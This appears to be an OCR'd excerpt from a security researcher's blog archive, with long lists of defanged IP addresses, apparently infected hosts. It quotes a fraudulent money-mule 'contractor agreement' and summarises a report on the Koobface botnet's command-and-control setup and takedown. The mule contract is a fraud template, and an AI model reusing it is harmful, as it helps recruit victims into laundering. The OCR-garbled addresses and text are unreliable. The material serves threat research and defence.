66[.]56[.]233[.]79 
76[.]226[.]11[.]79 
71[.]169[.]141[.]118 
67[.]142[.]162[.]29 
24[.]44[.]162[.]69 
76[.]116[.]61[.J212 
168[.]16[.]193[.]126 
199[.]227[.]146[.182 
173[.]21[.]59[.]245 
71[.]226[.]132[.]134 
67[.J11[.]245[.]57 
64[.]26[.197[.184 
68[.]46[.]43[.]26 
65[.]11[.]141[.]87 
72[.]65[.]156[.]146 
12[.]14[.]199[.]234 
67[.]243[.]42[.J115 
173[.]16[.J28[.]182 
67[.]166[.]227[.]243 
96[.]238[.]93[.]124 
75[.]185[.]155[.]89 
67[.]176[.]141[.]242 
98[.]166[.]139[.]228 
24[.]58[.J111[.]195 
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72[.]72[.]214[.]6 
68[.]197[.]139[.]65 
71[.]41[.]177[.]66 
74[.]176[.]184[.]48 
68[.]191[.]9[.]132 
69[.J27[.]229[.]11 
96[.]39[.]175[.]73 
74[.]166[.]122[.]66 
24[.]47[.]15[.]144 
12[.]52[.]253[.]141 
168[.]13[.]223[.]66 
76[.J15[.]21[.]232 
71[.]199[.]237[.]16 
24[.]59[.]159[.J225 
74[.]184[.1254[.]231 
69[.]84[.]97[.]79 
98[.]28[.]132[.]126 
134[.]68[.]178[.]159 
12[.]215[.J211[.]251 
75[.]128[.]233[.]94 
69[.]245[.]151[.]66 
24[.]213[.]149[.]122 
216[.]79[.]8[.]3 
98[.]219[.]216[.]132 
66[.]194[.]51[.]34 
174[.]48[.]228[.]16 
24[.]173[.]49[.184 
74[.]239[.]136[.]252 
125[.]161[.]216[.]144 
68[.]236[.]118[.]222 
99[.]159[.]79[.]156 
137[.]45[.]146[.]171 
98[.J215[.]126[.]227 
68[.]62[.]51[.]216 
69[.]246[.]155[.]35 


27217 


71[.]197[.18[.]146 
125[.]161[.]245[.]28 
98[.]197[.]197[.]98 
68[.]32[.]145[.]172 
76[.]187[.]248[.]67 
76[.]24[.]45[.]195 
96[.]238[.]95[.]191 
124[.]195[.]6[.]121 
74[.]71[.]145[.]82 
98[.]222[.]13[.]248 
96[.]237[.]238[.]126 
24[.]247[.]252[.]192 
24[.]94[.J252[.]121 
74[.144[.]165[.]4 
71[.]71[.]89[.]227 
24[.]99[.]66[.]224 
76[.]25[.]26[.]133 
162[.]127[.]32[.]57 
74[.193[.]214[.]33 
68[.]196[.]27[.]59 
69[.]136[.]233[.]59 
96[.]243[.]236[.]227 
76[.]113[.]95[.]131 
71[.]239[.]162[.]32 
68[.]42[.]93[.]143 
75[.]167[.]177[.]58 
72[.]187[.]45[.]78 
69[.]123[.]52[.]94 
24[.]61[.]17[.]48 
64[.]115[.]231[.]42 
63[.]214[.]229[.]9 
97[.]119[.]79[.]22 
74[.]232[.]27[.]135 
98[.]183[.]84[.]149 
66[.]68[.]227[.]51 
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24[.]152[.]192[.]253 
125[.]161[.]53[.]22 
67[.]9[.]4[.197 
24[.]118[.]194[.]117 
24[.]88[.]236[.]15 
98[.]168[.]163[.]68 
168[.]91[.]1[.]131 
67[.]11[.]43[.]156 
71[.]141[.]144[.]6 
71[.]244[.]152[.]196 
12[.]232[.]12[.]65 
12[.]164[.]187[.]98 
98[.]194[.]63[.]156 
174[.]149[.]48[.]124 
72[.]193[.]61[.]64 
137[.]45[.]48[.]7 
68[.]153[.]226[.]253 
66[.]21[.]146[.]148 
24[.]125[.]247[.]216 
216[.]145[.]192[.]6 
24[.]147[.]163[.]111 
71[.]139[.]149[.]182 
66[.]227[.]194[.]133 
125[.]162[.]83[.]126 
67[.]241[.]19[.]186 
75[.]65[.]133[.]138 
12[.]49[.]194[.]26 
68[.]39[.]166[.J195 
97[.]95[.]144[.]24 
71[.]248[.]18[.]173 
24[.J175[.]31[.]197 
75[.]74[.]188[.]21 
74[.]167[.187[.]24 
76[.]17[.]68[.144 
72[.]152[.]64[.]165 
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72[.]195[.]129[.]32 
74[.J211[.]19[.]247 
72[.]187[.]18[.]232 
71[.]255[.]125[.]138 
66[.]186[.]99[.]253 
72[.]181[.]194[.]52 
71[.]199[.]224[.]79 
76[.]165[.]33[.]188 
71[.]163[.]23[.]8 
76[.]226[.]77[.]172 
68[.]23[.]93[.]82 
216[.]248[.]224[.]26 
97[.]89[.]59[.]99 
97[.]65[.]239[.]14 
63[.]228[.]189[.]222 
71[.]62[.]242[.]23 
72[.]231[.]137[.]42 
65[.]33[.]85[.]2 
134[.]84[.]156[.]153 
68[.]15[.]132[.]66 
72[.]192[.]58[.]246 
216[.]15[.]64[.]135 
24[.]228[.]6[.]238 
68[.]81[.]126[.]188 
65[.]33[.]52[.]163 
99[.]189[.]155[.]127 
72[.]92[.]239[.]55 
66[.]32[.]175[.]91 
74[.]232[.]115[.]228 
216[.]235[.]228[.]8 
72[.]84[.]83[.]51 
75[.]45[.]195[.]76 
71[.]173[.]254[.]133 
76[.]29[.]71[.]244 
68[.]99[.]166[.]57 
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96[.J227[.]122[.]141 
65[.]65[.]19[.]81 
173[.]28[.]158[.]185 
12[.]J6[.]2[.]113 
96[.]253[.]81[.]162 
98[.]222[.]186[.]158 
64[.]219[.]69[.]34 
66[.]31[.]17[.]15 
125[.]162[.]121[.]233 
66[.]41[.]239[.]194 
72[.]181[.]3[.197 
65[.]25[.]55[.]64 
24[.]44[.]213[.J251 
96[.]37[.]128[.]194 
72[.]156[.]198[.]234 
98[.]122[.]39[.J229 
65[.]1[.]55[.]253 
69[.]143[.]238[.]96 
52[.]129[.]8[.]52 
71[.]61[.]1[.]166 
198[.]133[.]178[.]17 
165[.]166[.]214[.]228 
24[.]167[.]148[.]251 
98[.]243[.]194[.]151 
199[.]245[.]163[.]1 
65[.]199[.]214[.]194 
75[.]118[.]232[.]249 
125[.]161[.]245[.]83 
76[.]18[.]75[.19 
65[.]78[.]91[.]134 
67[.]241[.]214[.]54 
68[.]37[.]132[.]165 
71[.1244[.]86[.]178 
68[.]162[.]147[.]46 
76[.]176[.]93[.181 
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66[.]189[.]9[.]12 
96[.]4[.J22[.]148 
96[.]4[.]63[.]21 
67[.]87[.J217[.]214 
76[.]242[.]111[.]144 
76[.]122[.]38[.]54 
96[.]36[.]89[.]41 
71[.]33[.]18[.]44 
65[.]242[.]241[.]242 
69[.]245[.]14[.]97 
76[.]118[.]172[.]62 
68[.]62[.]52[.]45 
74[.]166[.]252[.]16 
24[.]188[.]68[.]122 
68[.]61[.]178[.]79 
71[.]42[.]218[.]173 
173[.]65[.1242[.]163 
68[.]37[.]71[.]31 
131[.]247[.]244[.]198 
71[.]239[.]37[.]85 
68[.]51[.]47[.]235 
71[.]234[.]192[.J175 
24[.]119[.]49[.]126 
75[.]65[.]91[.]113 
68[.]12[.]166[.]163 
69[.]151[.]253[.]35 
68[.]188[.]215[.]13 
65[.]96[.J221[.]117 
65[.]247[.]121[.]5 
67[.]111[.]164[.]46 
151[.]141[.]137[.182 
69[.]136[.]174[.]186 
173[.]49[.174[.]223 
67[.]175[.]231[.]131 
71[.]234[.]232[.]167 
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Moreover, sample agreement that each and every money mule has to accepted before 
becoming part of the money mule recruitment network. A second agreement contract 
containing unique (Photoshop-ed) signing seal for each of the bogus brands has to be also 
signed, scanned and uploaded through their interface. Both of these agreements, including 
localized copies in several different languages can be purchased from the managed money 
mule recruitment vendor from $30 to $70. Here’s a sample of the agreement and tag clouds 
for the company description, the agreement itself and the FAQ: 


, Contractors 


ane ~~ connection terms ~ | 


duties : 
pet 


new, Pesonal ") DrOGRSSING “Fe agiees 


written 
delay 


engagement 


manager 


DUTIES: 


The Contractor undertakes the responsibility to receive payments from the Clients of 
the Company to his personal bank account, withdraw cash and to effect payments to the 
Company’s partners by Western Union or MoneyGram money transfer system within one (1) 
day. He/she will report directly to the senior manager and to any other party designated by 
the senior manager in connection with the performance of the duties under this Agreement 
and shall fulfill any other duties reasonably requested by the Company and agreed to by the 
Contractor. 


CONFIDENTIALITY: 
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76[.]113[.]151[.]169 
166[.]61[.]194[.]194 
76[.]127[.]222[.]39 
75[.]65[.]191[.]95 
98[.]199[.]162[.]247 
72[.]178[.J19[.]215 
65[.]8[.]246[.]18 
75[.]145[.]6[.]189 
72[.]198[.]3[.]245 
76[.]231[.]83[.]238 
216[.]157[.]229[.]196 
98[.]191[.]226[.]17 
98[.]24[.]66[.]111 
99[.]144[.]141[.]115 
74[.]238[.]116[.]248 
68[.]114[.]154[.J121 
173[.]88[.J251[.J211 
67[.]8[.]165[.]54 
76[.J17[.]59[.]165 
68[.]82[.]236[.]53 
68[.]82[.]138[.J121 
98[.]24[.]49[.]1 
24[.]25[.]191[.]143 
173[.]77[.J17[.]245 
96[.]241[.]232[.]135 
72[.]234[.]132[.]48 
76[.]181[.]153[.]139 
71[.]255[.]193[.]228 
98[.]166[.]46[.]226 
68[.]81[.]32[.]12 
24[.]118[.]28[.]93 
76[.]19[.]198[.]184 
67[.]186[.]62[.]238 
67[.J242[.]12[.]54 
97[.]83[.]232[.]3 
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142[.]58[.]91[.]122 
24[.]228[.]55[.]78 
98[.]115[.]38[.]241 
216[.]199[.]177[.]158 
76[.]23[.]252[.]126 
74[.1247[.139[.]4 
75[.]187[.]151[.]119 
125[.]161[.]217[.]162 
68[.]96[.]183[.]33 
173[.]73[.]194[.]166 
72[.]213[.]197[.]89 
96[.]236[.]91[.]248 
168[.]13[.]127[.]66 
72[.]26[.]142[.]196 
68[.]211[.]22[.]181 
216[.]136[.]25[.]37 
71[.]217[.]183[.]228 
173[.]68[.]55[.]32 
75[.]181[.]58[.]95 
74[.]237[.]168[.]22 
72[.]184[.]224[.J222 
24[.]117[.]86[.]116 
99[.]158[.]151[.]86 
24[.]227[.]32[.]18 
67[.]52[.]51[.]74 
65[.]8[.J172[.]219 
24[.]164[.]178[.]119 
72[.J178[.17[.]217 
24[.]63[.]175[.]136 
68[.]83[.]124[.]213 
75[.]133[.]91[.]113 
98[.]195[.]122[.]95 
65[.]185[.]11[.]125 
98[.]192[.]223[.]219 
76[.]114[.]186[.]93 
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74[.171[.]113[.]244 
68[.]49[.]123[.]169 
71[.]57[.J235[.]43 
71[.]58[.]19[.]171 
24[.]61[.]91[.J216 
96[.]248[.]181[.]32 
68[.]187[.]139[.]19 
68[.]61[.]174[.]78 
98[.]216[.]158[.]239 
216[.]67[.]221[.]165 
68[.]57[.]175[.]16 
69[.]245[.]6[.]115 
98[.]231[.]6[.]176 
24[.]253[.]54[.]62 
72[.]147[.]85[.]184 
68[.]13[.]147[.]143 
75[.]68[.]65[.]214 
125[.]161[.]223[.]121 
192[.]88[.]94[.]254 
67[.]174[.]142[.]239 
67[.]8[.]214[.]98 
76[.]85[.]134[.]17 
76[.]243[.]176[.]78 
96[.]243[.]139[.]236 
74[.]212[.]48[.]8 
67[.]175[.]244[.]32 
24[.J1[.]22[.]247 
71[.]185[.]149[.]152 
67[.]186[.]245[.]188 
66[.]157[.]125[.]79 
173[.J64[.]85[.]253 
68[.]212[.]238[.]116 
68[.J221[.]253[.]153 
129[.]19[.]189[.]254 
68[.]47[.]237[.]11 
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69[.]212[.]51[.]254 
24[.]234[.]211[.]4 
216[.]76[.]76[.]131 
76[.]84[.]185[.]177 
74[.]232[.]123[.J115 
76[.]111[.]32[.]172 
71[.]199[.]51[.]28 
76[.]23[.J234[.]151 
72[.]135[.]213[.J171 
24[.]33[.]253[.]15 
173[.]19[.19[.]189 
75[.]54[.]79[.]55 
72[.]218[.]159[.]93 
67[.]177[.]97[.]1 
71[.]236[.]172[.]12 
98[.]26[.]135[.J211 
74[.1244[.1237[.]48 
71[.]178[.]219[.]41 
71[.]14[.]41[.]227 
68[.]192[.]46[.]66 
65[.]25[.]14[.]161 
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The Contractor acknowledges that during the engagement he will have access to and 
become acquainted with various trade secrets, inventions, innovations, processes, informa- 
tion, records and speci cations owned or licensed by the Company and/or used by the Company 
in connection with the operation of its business including, without limitation, the Company’s 
business and product processes, methods, customer lists, accounts and procedures. The 
Contractor agrees that he will not disclose any of the aforesaid, directly or indirectly, or 
use any of them in any manner, either during the term of this Agreement or at any time 
thereafter. All les, records, documents, blueprints, speci cations, information, letters, notes, 
media lists, original artwork/creative, notebooks, and similar items relating to the business of 
the Company, whether prepared by the Contractor or otherwise coming into his possession, 
shall remain the exclusive property of the Company. 


The Contractor shall not retain any copies of the foregoing without the Company’s prior 
written permission. The Contractor further agrees that he will not disclose his retention as 
an independent contractor or the terms of this. Agreement to any person without the prior 
written consent of the Company and shall at all times preserve the con dential nature of his 
relationship to the Company and of the services hereunder. If the Contractor releases any 
of the above information to any parties outside of this company, such as personal 
friend, close relatives or other Financial Institutions such as a Bank or other Finan- 
cial Firms, it could be grounds for immediate termination. If the Contractor is ever in 
doubt of what information can be released and when, the Contractor will contact their superior 
right away. 


Watson 
New business 


gatinstes your financt ny al. 
rmacuai COMP any 


; Bg ny Ss 


: 


| ‘e > world-known ¢ 


— thusiasts 
ae among author itative en 
ran We ia ket 


Oon- | ine pide providing 


comprehensive cory based paccmpany acquired 


groups success v 
USA fairly 


holding 
Inc 


finance 
staff stock global 


TERMS OF ENGAGEMENT 


2726 


173[.]52[.J211[.]45 
24[.J252[.]74[.J175 
75[.]185[.]115[.]227 
173[.]77[.J116[.]218 
68[.]59[.]255[.]147 
24[.]186[.]186[.]27 
72[.]155[.]15[.]31 
75[.]66[.]197[.]217 
74[.144[.]71[.]81 
71[.]253[.]126[.]82 
71[.]59[.]5[.J241 
63[.]214[.]229[.]2 
76[.]122[.]211[.]223 
66[.]229[.]9[.]14 
72[.]94[.J171[.]11 
76[.]226[.]42[.]167 
96[.]248[.]173[.]248 
74[.]235[.]143[.J251 
76[.]98[.]215[.]159 
173[.]49[.]25[.]244 
76[.]27[.]162[.]217 
69[.]183[.]228[.]35 
69[.]139[.]166[.]178 
72[.]82[.]249[.]18 
68[.]11[.]29[.]34 
68[.]44[.]255[.J213 
24[.]252[.]145[.]224 
71[.]228[.]174[.]245 
98[.]111[.]182[.]39 
76[.]19[.]58[.]128 
173[.]77[.]214[.]116 
72[.]145[.137[.]96 
72[.]86[.]42[.]241 
71[.]112[.]9[.]31 
67[.]87[.]42[.]119 


27233 


99[.]8[.J233[.]78 
173[.]58[.]131[.]14 
71[.]172[.]176[.]242 
98[.]28[.]13[.]199 
76[.]123[.]181[.J151 
68[.]228[.]246[.]148 
71[.]56[.]114[.]172 
69[.]142[.]65[.]182 
96[.]246[.]214[.]192 
69[.]14[.]54[.]7 
64[.]252[.]141[.]11 
67[.]177[.]162[.]119 
69[.]249[.]228[.]125 
99[.]238[.]37[.]132 
69[.]116[.]116[.]126 
81[.]245[.]231[.]63 
76[.]24[.]65[.]238 
98[.]113[.]27[.]144 
75[.]72[.]23[.]59 
66[.]176[.]58[.]147 
71[.]99[.157[.]82 
75[.]67[.]244[.]78 
71[.]245[.]57[.]62 
71[.]167[.]7[.]184 
68[.]51[.J215[.J217 
69[.]138[.]57[.]115 
76[.J17[.]238[.]152 
98[.]198[.]148[.]193 
69[.]248[.]9[.]3 
71[.]243[.]113[.]169 
96[.]237[.]148[.]7 
72[.]65[.]135[.]116 
98[.]119[.]78[.]177 
24[.]218[.]85[.J217 
71[.]252[.]56[.]188 
27234 


68[.]52[.]22[.]45 
71[.]185[.]149[.]134 
67[.]82[.]3[.]69 
24[.]18[.]45[.]32 
71[.]239[.]234[.]96 
75[.]68[.]45[.]65 
98[.]114[.]84[.]134 
75[.]68[.J12[.]251 
24[.]131[.]163[.]13 
99[.]245[.]161[.]116 
67[.]176[.]218[.]184 
98[.J222[.]184[.]187 
72[.]84[.]134[.]195 
24[.]99[.]127[.]57 
141[.]151[.]16[.]27 
68[.]46[.]215[.]32 
67[.]81[.]141[.]188 
173[.]65[.]15[.]246 
24[.]218[.]163[.]86 
98[.]219[.]79[.]172 
69[.]253[.]83[.]231 
68[.]45[.]161[.]55 
69[.]255[.]65[.]113 
68[.]57[.]211[.]92 
69[.]116[.]141[.]243 
76[.]119[.]159[.]246 
74[.]92[.J21[.]75 
24[.]3[.]233[.]141 
74[.]12[.]194[.]87 
93[.]72[.]143[.]195 
65[.]78[.]39[.]19 
212[.]182[.]164[.]5 
189[.]61[.]165[.]84 
189[.]74[.J115[.]145 
145[.]53[.J137[.]219 


27235 


189[.]122[.]162[.]139 
195[.]241[.]245[.]69 
193[.]172[.]125[.]195 
187[.]25[.]37[.]22 
189[.]12[.]52[.]147 
83[.]39[.]65[.]248 
189[.]47[.]218[.]11 
189[.]28[.]162[.]75 
213[.]93[.]132[.]174 
189[.]58[.J224[.]228 
189[.]115[.]247[.]76 
189[.]16[.]238[.]122 
189[.]115[.]245[.]72 
189[.]7[.]21[.]243 
83[.]53[.]196[.]152 
64[.]184[.]179[.]89 
72[.]184[.]83[.J124 
195[.]64[.]78[.]167 
189[.]123[.]184[.]153 
187[.]21[.]2[.]7 
187[.]14[.]7[.]139 
189[.]69[.]28[.]11 
189[.]41[.]231[.J172 
189[.]56[.]95[.]34 
213[.]254[.]64[.]236 
189[.]72[.]126[.]181 
83[.]6[.]182[.]143 
189[.]54[.]168[.]245 
189[.]24[.181[.]83 
189[.]81[.]63[.187 
59[.]184[.]123[.]61 
189[.]58[.]169[.]176 
189[.]27[.]188[.]16 
189[.]29[.]91[.]98 
187[.]4[.]84[.]78 
27236 


189[.]168[.]127[.]51 
189[.]27[.]243[.J225 
187[.]27[.]43[.]92 
189[.]24[.]234[.]97 
189[.]124[.]144[.]42 
189[.]18[.]11[.]143 
212[.]97[.]169[.193 
62[.]143[.]24[.]145 
189[.]51[.]46[.]12 
189[.]51[.]46[.]35 
118[.]173[.]219[.]219 
189[.]58[.]86[.]238 
189[.]71[.]153[.]65 
189[.]79[.]88[.]227 
189[.]124[.]236[.]51 
189[.]76[.]21[.]155 
189[.]247[.]79[.]226 
189[.]111[.]36[.]58 
189[.]81[.J242[.]2 
64[.]59[.]144[.]22 
189[.]7[.]76[.]147 
189[.]63[.]73[.]172 
189[.]24[.J226[.]156 
189[.]68[.J212[.]241 
189[.]13[.J211[.]24 
189[.]142[.]72[.]95 
189[.]22[.J125[.]29 
189[.]136[.]17[.]185 
189[.]111[.]32[.]27 
189[.]4[.]162[.]116 
79[.J153[.]223[.]247 
189[.]61[.]25[.]183 
195[.]241[.]214[.]112 
189[.]85[.]185[.]24 
189[.]96[.]159[.]163 


27237 


189[.]52[.]32[.]237 
189[.]17[.]213[.]198 
222[.]123[.]69[.174 
88[.]16[.]136[.]32 
189[.]1[.]128[.]84 
218[.]248[.]75[.]149 
89[.J155[.]15[.]142 
189[.]152[.]156[.]47 
189[.]58[.]45[.]69 
189[.]27[.]21[.]62 
118[.]173[.]223[.]37 
189[.]83[.]143[.]199 
172[.]24[.]57[.]44 
189[.]19[.]87[.]131 
189[.]65[.]45[.]165 
189[.]126[.]171[.]22 
189[.]23[.]217[.]59 
189[.]84[.]167[.18 
189[.]128[.]113[.]31 
189[.]129[.]32[.J231 
189[.]35[.]28[.]142 
189[.]11[.]232[.]118 
189[.]36[.]143[.]49 
189[.]83[.]128[.]213 
189[.18[.]38[.]82 
117[.]198[.]34[.J227 
86[.]213[.]87[.]77 
189[.]78[.]193[.]29 
189[.]131[.]236[.]195 
88[.]186[.]236[.]42 
189[.]121[.]211[.]159 
189[.]174[.]186[.]238 
189[.]24[.]141[.]79 
189[.]78[.]11[.]41 
189[.]225[.]78[.J225 
27238 


59[.]93[.]114[.]188 
189[.]69[.]64[.147 
213[.]37[.]133[.]175 
189[.]6[.J232[.]23 
189[.]4[.]126[.]59 
213[.]93[.]233[.]14 
122[.]169[.]67[.]1 
121[.]246[.]253[.]143 
88[.]153[.]229[.]122 
123[.]19[.]34[.]242 
213[.]9[.]174[.]75 
59[.]96[.]212[.]163 
82[.]252[.]182[.]79 
121[.]7[.]216[.]148 
187[.]132[.]66[.]231 
122[.]161[.]44[.]59 
79[.]93[.]2[.]7 
117[.]192[.]12[.]54 
117[.]197[.]192[.]144 
189[.]47[.]241[.]188 
219[.]64[.]89[.]134 
217[.]126[.]251[.]36 
59[.]177[.]133[.]242 
189[.]159[.]39[.]221 
91[.]33[.]215[.]192 
77[.J126[.]239[.]64 
83[.]141[.]187[.]83 
213[.]51[.]117[.]56 
122[.]168[.]51[.]29 
217[.J217[.]156[.]55 
212[.]186[.]98[.]47 
189[.]182[.]219[.]191 
117[.]195[.197[.]32 
123[.]238[.]7[.]252 
196[.]213[.]21[.]34 


27239 


196[.]35[.]158[.]183 
217[.J]122[.]88[.]21 
78[.]115[.]71[.]85 
125[.]27[.J114[.J115 
85[.]18[.]14[.]39 
83[.]51[.]98[.]96 
195[.]241[.]244[.]27 
195[.]241[.]182[.]75 
84[.]57[.J177[.]17 
114[.]69[.J237[.]134 
217[.J]123[.]88[.]21 
213[.]97[.]13[.]34 
213[.]98[.]152[.]166 
88[.]173[.]129[.]92 
189[.]112[.]196[.]111 
195[.]241[.]212[.]125 
189[.]72[.]246[.]41 
114[.]69[.J237[.]153 
213[.J227[.]26[.]16 
79[.]85[.]21[.]42 
83[.]128[.]17[.]134 
59[.]183[.]152[.]137 
213[.]144[.]244[.]237 
212[.]45[.]53[.J122 
82[.]174[.]245[.J171 
212[.]45[.]52[.]229 
119[.]42[.]71[.]9 
196[.]12[.]236[.]119 
189[.]7[.]65[.]218 
117[.]193[.]194[.]168 
219[.]64[.]119[.178 
85[.]222[.]163[.]46 
189[.]74[.]2[.]244 
218[.]248[.]69[.]32 
89[.]131[.]244[.]241 
27240 


212[.]45[.]32[.J221 
189[.]79[.]193[.18 
121[.]243[.]87[.J129 
86[.]64[.]65[.]126 
92[.]129[.]147[.]4 
88[.]123[.]12[.]143 
93[.]125[.]163[.]159 
92[.]139[.]162[.]139 
86[.]93[.]178[.]113 
189[.]83[.]56[.]42 
213[.]27[.]243[.]177 
189[.]92[.]161[.]51 
59[.]93[.]125[.]166 
189[.]4[.J236[.]81 
91[.J17[.1244[.]97 
213[.]22[.]57[.J113 
79[.]152[.]247[.]117 
123[.]237[.]116[.]211 
189[.]7[.]41[.]5 
189[.]79[.]199[.]133 
187[.]25[.]167[.]231 
217[.]128[.]111[.]56 
189[.]31[.]17[.]243 
62[.]177[.]129[.]191 
82[.]93[.]19[.]153 
86[.]74[.]11[.]99 
189[.]58[.]228[.]18 
82[.]245[.]187[.]191 
213[.]151[.]181[.]172 
87[.J211[.]48[.]97 
119[.]56[.]79[.]11 
116[.]14[.]72[.]23 
189[.]41[.]148[.]189 
88[.]67[.]221[.]65 
92[.]78[.]85[.]16 


27241 


187[.]11[.]42[.]177 
122[.]163[.]249[.]71 
213[.]84[.]48[.]15 
82[.]255[.]147[.]213 
79[.]97[.]91[.169 
189[.]82[.]222[.]113 
219[.]74[.]139[.]119 
213[.]93[.]199[.]18 
189[.]123[.]164[.]159 
189[.]145[.]149[.]49 
147[.]156[.]251[.]194 
62[.]216[.]11[.J151 
212[.]182[.]139[.]229 
217[.]216[.]93[.184 
213[.]172[.]34[.]234 
189[.]29[.]2[.]64 
148[.]213[.]67[.]53 
189[.]69[.J172[.]92 
77[.J251[.]159[.]153 
85[.]144[.]168[.189 
189[.]68[.]12[.188 
62[.]133[.]98[.]44 
77[.J225[.]134[.]52 
213[.]41[.]193[.]114 
94[.]215[.]234[.]216 
189[.]178[.]9[.]162 
81[.]57[.]199[.]198 
189[.]82[.]9[.]69 
189[.]41[.]214[.]17 
85[.]147[.]225[.]44 
194[.]158[.]222[.]48 
189[.]27[.]74[.]182 
193[.]242[.]192[.]9 
189[.]69[.]174[.]247 
59[.]89[.]48[.]132 
27242 


The Contractor is engaged by the Company on terms of thirty days (30) probationary 
period. During the probationary period the Company undertakes to pay to the Con- 
tractor the base salary amounting to 2300 USD per month plus 8 % commission from 
each payment processing operation. After the probationary period the Company 
agrees to revise and raise the base salary up to 3000 USD. The Company has the right 
to cancel this Agreement at any time within the probationary period or refuse to extend it after 
that, should the Contractor refuses to fulfill his/her obligations under this Agreement or fulfills 
them not in good faith. The Contractor has the right to terminate the Agreement at any time 
on condition that he/she has processed all previous payments and has no new instructions. 


COMPENSATION: 


The Company undertakes to pay taxes accrued in connection with money transfer. The 
Company shall also reimburse part of expenses which are incurred in connection with money 
transfer by Western Union or MoneyGram systems (should money transfer charges exceed 
3 %, i.e. commission for payment processing operation). The above difference will be auto- 
matically added to the basic salary of the Contractor and paid once per month together with 
the basic salary. All reasonable and approved out-of-pocket expenses which are incurred in 
connection with the performance of the duties hereunder shall be reimbursed by the Company 
during the term of this Agreement, against the bill presented by the Contractor. The Company 
shall have the right to decrease the Contractor’s commission in case the payment processing 
terms were violated by the Contractor. 
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Should the Contractor delays re-sending money accepted to his bank account for the period 
exceeding one (1) day without any explicit reason, the Company shall have the right to 
impose sanctions on the Contractor if only the delay has not been caused by the Force Majeur 
circumstances and to apply to the arbitration and claim for the reimburse of the amount 
transferred to his account or for compensation for other damage if any, evicted due to the 
delay. The Contractor may take days off at any time and at his/her option upon giving five (5) 
working days advance notice in writing to the Company in order that the latter may abstain 
from charging the Contractor with new instructions. However, salary for each day-off is 
deducted from the Contractor’s base salary." 


Sample agreement that each and every potential money mule has to upload through 
the web interface, interestingly, each and every of the bogus brands has a custom made Seal, 
part of the services offered by the managed vendor: 
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With such a professional attitude towards their work, now a process that’s easily outsourced to 
vendors specializing in quality design and bogus company creation services, their recruitment 
process is prone to reach new levels of efficiency, which is why standardization was applied 
at the first place. However, just like in the case of malware and scareware, template-ization 
undermines their operational security (OPSEC) a process which they’re clearly aware, but do 
not fully utilize since money mule recruitment is currently in efficiency-mode. 


Knowing the transactions pattern for a money mule recruitment, one which is clearly 
visible while going through their agreements, can in fact make it easier for financial institu- 
tions to protect their customers from themselves before it gets too late and they unknowingly 
dive deep into the money mule recruitment business model. 
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5.10.4 Koobface Botnet Dissected in a TrendMicro Report (2009-10-14 18:22) 


C&C ARCHITECTURE 


Compared with the complex C&C architecture of the Storm, WALEDAC, and DOWNAD botnets, the KOOBFACE C&C 
infrastructure is very basic. It only consisted of infected nodes and C&C domains that used HTTP as its communication 
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Figure 40. KOOBFACE C&C prior to July 19, 2009 Figure 41. Updated KOOBFACE C&C as of July 19, 2009 


This simplistic C&C approach is, of course, very vulnerable to takedowns. After several KOOBFACE C&C takedown 
attempts initiated by Intemet service providers (ISPs) and members of the security industry,’ the KOOBFACE gang 
realized the need for a more robust C&C infrastructure. Thus, on July 19, 2009, the KOOBFACE writers implemented 
a new C&C architecture that involved the use of proxy nodes to provide redundancy and to improve the survivability of 
their C&C should another takedown be attempted + 


A few days after the new KOOBFACE C&C infrastructure was implemented, the botnet was seen inserting a message 
(see below) for one of the security researchers tracking the malware’s domain activities 


(2009-07-22 20:24:17) 
#We express our high gratitude to Dancho Danchev (http://ddanchev.blogspot.com) 


#for the help in bug fixing, researches and documentation for our software. 


I’d like to thank the folks at [1]TrendMicro for mentioning the message inserted by the 
Koobface gang ([2]more love [3]on a first-name basis [4]from them) within their command 
and control infrastructure for nine days, [5]greeting me for systematically [6]kicking them out 
of their ISPs, and suspending their command and control domains, in a new report entitled 
[7]The Heart of Koobface - C &C and Social Network Propagation: 


"This simplistic C &C approach is, of course, very vulnerable to takedowns. After sev- 
eral KOOBFACE C &C takedown attempts initiated by Internet service providers (ISPs) and 
members of the security industry, the KOOBFACE gang realized the need for a more robust C 
&C infrastructure. 


Thus, on July 19, 2009, the KOOBFACE writers implemented a new C &C architecture 
that involved the use of proxy nodes to provide redundancy and to improve the survivability 
of their C &C should another takedown be attempted. A few days after the new KOOBFACE C 
&C infrastructure was implemented, the botnet was seen inserting a message (see below) for 
one of the security researchers tracking the malware’s domain activities. 


This message run lasted nine days from July 22 to July 30, 2009. Based on this incident, 
we can safely assume that the KOOBFACE gang has been monitoring blogs, articles, write-ups, 
and analyses about their handiwork and was probably also keeping tabs on the various 
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solutions deployed to counter the botnet’s attacks. Second, these people were thus quick to 
act and fix their creation’s weaknesses, as evidenced by its change in infrastructure. Finally, 
the botnet’s creators were bold enough to send taunting messages to security researchers." 


Having the Koobface gang kicked out of their ISPs in 48 hours through close cooperation 
with China’s CERT; BlueConnex Ltd; PacificRack.com; Oc3 Networks & Web Solutions LIc; 
Telos-Solutions-AS/Telos Solutions LTD, resulted in a single command and control domain 
which was active and using the services of UKSERVERS-MNT (AS42831), 78.110.175.15 in 
particular. Simply put, the Koobface botnet and the hundreds of thousands of infected hosts 
were not just sitting ducks, but ducks who’ve fallen asleep in the middle of the hunting season. 


It’s important to point out that the company (UKSERVERS-MNT) on purposely lied that the 
customer has been taken offline, allowed the Koobface gang to access the server since 
the gang claimed "it’s a compromised customer and needs to clean-up the mess", then on 
purposely stopped responding to the smoothly going data sharing process, thereby allowing 
the Koobface gang to put their contingency plan in place. 


The bottom line - based on already published and to-be published assessments of this 
group’s activities, the Koobface botnet [8]appears to be only the [9]tip of the iceberg for 
the [10]Ali baba and the 40 thieves cybercrime enterprise - a self-describing [11]message 
included by the Koobface gang. Their activities also prove a point - a single cybercrime enter- 
prise can efficiently and automatically dominate the entire Web 2.0 threatscape, if they want to. 


Related posts: 

[12]Koobface Botnet’s Scareware Business Model 
[13]Movement on the Koobface Front - Part Two 
[14]Movement on the Koobface Front 

[15]Koobface - Come Out, Come Out, Wherever You Are 
[16]Dissecting Koobface Worm’s Twitter Campaign 
[17]Dissecting the Koobface Worm’s December Campaign 
[18]Dissecting the Latest Koobface Facebook Campaign 
[19]The Koobface Gang Mixing Social Engineering Vectors 
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5.10.5 Koobface Botnet Dissected in a TrendMicro Report (2009-10-14 18:22) 


C&C ARCHITECTURE 


Compared with the complex C&C architecture of the Storm, WALEDAC, and DOWNAD botnets, the KOOBFACE C&C 
infrastructure is very basic. It only consisted of infected nodes and C&C domains that used HTTP as its communication 


protocol 
rod Retrieve commands and 
ae 1 KOOBFACE zombie computers’ IP 
